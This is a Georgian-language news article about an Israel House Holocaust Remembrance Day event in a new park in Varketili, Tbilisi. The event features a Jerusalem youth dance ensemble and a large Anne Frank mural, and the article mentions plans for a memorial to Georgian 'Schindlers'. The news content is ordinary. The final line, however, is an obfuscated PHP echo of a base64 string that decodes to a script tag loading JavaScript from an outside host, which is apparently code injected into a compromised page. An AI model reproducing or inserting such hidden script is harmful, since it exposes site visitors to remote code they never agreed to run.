celsiusi
ავერსი საქკაბელი
28 აპრილს ისრაელი და მსოფლიო ებრაელობა აღნიშნავს ჰოლოკოსტის მსხვერპლთა ხსოვნის დღეს. „ისრაელის სახლმა“ ეს დღე ისრაელიდან საქართველოში სტუმრად მყოფ გოგონათა და ბიჭუნათა ცეკვის ანსამბლთან ერთად ვარკეთილში, ახლად მოწყობილ პარკში აღნიშნა.
 
იერუსალიმის მერიასთან არსებული ანსამბლი „ორა ეფროხიმ იერუშალაიმ“ დაკომპლექტებულია ანა ფრანკის ასაკის - 15 წლის ისრაელელი გოგონებითა და ბიჭუნებით. მათ პარკში, ანა ფრანკის 30-მეტრიანი სურათის ფონზე, ახალგაზრდა მომღერალ ქრისტი ჯაფარიძესთან ერთად შეასრულეს ებრაული სიმღერა „ელი, ელი“, ჩაატარეს ჰოლოკოსტისადმი მიძღვნილი ცერემონიალი, ბოლოს კი შეასრულეს ისრაელის სახელმწიფოს ჰიმნი.
 
ღონისძიებაზე ონლაინ ჩაერთვნენ „საქართველოს უნივერსიტეტის“ ორგანიზებით გამართული კონფერენციის მონაწილე სტუდენტები და პროფესორ-მასწავლებლები. კონფერენცია ჰოლოკოსტის თემას ეძღვნებოდა, სადაც მთავარი მომხსენებლები იყვნენ ისრაელელი პროფესორი ავიტალ ზალმანოვიჩი და „ისრაელის სახლის“ ხელმძღვანელი იციკ მოშე.
 
 
ვარკეთილში ჰექტარნახევარზე გაშენებული პარკი თბილისის საკრებულოს მაჟორიტარი დეპუტატის რევაზ სოხაძის თაოსნობით მოეწყო. მას უახლოეს მომავალში თბილისის საკრებულოს გადაწყვეტილებით ქართველი შინდლერების სახელი მიენიჭება. პარკში „ისრაელის სახლის“ ინიციატივით ერთ-ერთი კორპუსის ყრუ კედელზე მოიხატა ანა ფრანკის პორტრეტი, უახლოეს დღეებში კი აღიმართება ქართველი შინდლერების მემორიალი.
 
„ისრაელის სახლის“ ხელმძღვანელის, იციკ მოშეს თქმით, ქართველი შინდლერების პარკი თავის ადგილს იკავებს ისრაელელებისა და მსოფლიო ებრაელობისთვის, როგორც კულტურული და ტურისტული ატრაქცია. დღეს  სწორედ ამიტომ გადაწყდა ჰოლოკოსტისადმი მიძღვნილი ხსოვნის ღონისძიების ამ პარკში გამართვა.
 
847
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");